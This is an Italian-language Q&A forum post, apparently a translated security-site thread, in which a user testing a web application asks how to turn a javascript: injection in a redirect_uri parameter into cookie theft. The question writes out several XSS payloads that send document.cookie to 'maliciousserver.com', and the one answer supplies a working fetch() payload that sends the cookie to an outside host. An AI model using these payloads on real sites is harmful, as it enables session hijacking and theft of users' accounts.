Exploit: invia cookie a un altro server dall'URL

0

Sto testando un'applicazione web e ho scoperto che url contiene "redirect=" dove naviga in una nuova posizione una volta effettuato l'accesso.

http://IPAddress/?redirect_uri=test

Sto cercando di sfruttare il cookie usando redirect_uri come HTTPOnly & I flag di sicurezza non sono impostati.

Ho provato diversi payload e sfruttato con successo utilizzando il seguente payload

http://IPAddress/?redirect_uri=javascript:alert(document.cookie)

Ora voglio trasferire il carico utile su un altro server malevolo, per questo ho provato a seguire i payload, ma niente funziona.

http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie=" + document.cookie

Il payload precedente non ha nemmeno inviato richieste al server malevolo, mentre la richiesta HTTP è stata ricevuta per il seguente payload

http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie="

Qualcuno potrebbe aiutarmi a trasferire il cookie utilizzando redirect_uri=javascript: di carico utile su un altro server?

P.S - I tag <script> </script> non vengono eseguiti poiché l'intestazione di protezione x-xss è abilitata.

    
posta vallikkv 16.12.2018 - 16:00
fonte

1 risposta

0

Il modo più semplice sarebbe utilizzare il metodo fetch() .

?redirect_uri=javascript:fetch("https://example.com/"+document.cookie)
    
risposta data 16.12.2018 - 16:24
fonte

Leggi altre domande sui tag